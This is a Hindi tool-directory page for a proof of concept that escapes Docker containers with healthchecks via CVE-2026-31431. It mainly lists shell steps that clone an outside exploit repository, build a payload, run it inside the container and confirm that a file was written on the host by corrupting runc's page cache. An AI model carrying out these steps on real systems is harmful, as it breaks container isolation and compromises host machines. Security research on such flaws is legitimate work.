Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-31431-Copy-Fail-Container-Escape — किसी भी डॉकर कंटेनर पर कंटेनर एस्केप, जिसमें healthcheck सक्षम है, CVE-2026-31431 के माध्यम से | Kitploit
उपकरण/GitHubGitHub/hans362/cve-2026-31431-copy-fail-container-escape
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणक्लाउड सुरक्षालर्निंग और शिक्षाकंटेनर एस्केप
GitHubhans362/cve-2026-31431-copy-fail-container-escape

CVE-2026-31431-Copy-Fail-Container-Escape

किसी भी डॉकर कंटेनर पर कंटेनर एस्केप, जिसमें healthcheck सक्षम है, CVE-2026-31431 के माध्यम से

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
23 महीने पहलेअभी तक समीक्षित नहीं

CVE-2026-31431-Copy-Fail-Container-Escape

डेमो

https://github.com/user-attachments/assets/2cb0cb67-789a-4461-a0b8-1fe878d9426e

पूर्वापेक्षाएँ

  • कंटेनर CVE-2026-31431 के प्रति संवेदनशील हो
  • कंटेनर हेल्थचेक कॉन्फ़िगर किया गया हो और हेल्थचेक CMD ज्ञात हो
  • कंटेनर के अंदर रूट एक्सेस प्राप्त हो (यदि नहीं, तो आप रूट एक्सेस पाने के लिए केवल Copy Fail का उपयोग कर सकते हैं)

इस रिपॉज़िटरी में, एक संवेदनशील कंटेनर सेट करने के लिए docker-compose.yml प्रदान किया गया है। आप किसी अन्य संवेदनशील कंटेनर का उपयोग कर सकते हैं या अपना खुद का सेट कर सकते हैं, लेकिन एक्सप्लॉइट कोड को तदनुसार बदलना याद रखें।

एक्सप्लॉइट के चरण

root@kitploit:~
# होस्ट मशीन पर
rm -r copy-fail-c /tmp/pwned
docker-compose up -d
git clone https://github.com/tgies/copy-fail-c.git
cp payload.c copy-fail-c/
cd copy-fail-c && make && cp exploit ../ && cd ..
docker cp exp.sh copyfail:/tmp/
docker cp exploit copyfail:/tmp/
docker exec -it copyfail /bin/sh

# copyfail कंटेनर के अंदर
cd /tmp
chmod +x exp.sh exploit
./exp.sh

# हेल्थचेक चलने के लिए कुछ मिनट प्रतीक्षा करें
# और जाँचें कि होस्ट पर /tmp/pwned बन गया है या नहीं

# होस्ट मशीन पर
ls /tmp/pwned

एक्सप्लॉइट सफल होने के बाद, होस्ट मशीन पर runc बाइनरी का पेजकैश दूषित हो जाता है। आप होस्ट पर echo 3 | sudo tee /proc/sys/vm/drop_caches चलाकर इसे पुनर्स्थापित कर सकते हैं।

श्रेय

  • https://copy.fail/
  • https://github.com/tgies/copy-fail-c

अस्वीकरण

यह रिपॉज़िटरी केवल शैक्षिक उद्देश्यों के लिए है। इसका उपयोग किसी भी दुर्भावनापूर्ण गतिविधि के लिए नहीं किया जाना चाहिए। इस कोड के दुरुपयोग से होने वाली किसी भी क्षति के लिए लेखक जिम्मेदार नहीं है। इसका उपयोग हमेशा नियंत्रित और कानूनी वातावरण में करें।

टूल डाउनलोड करें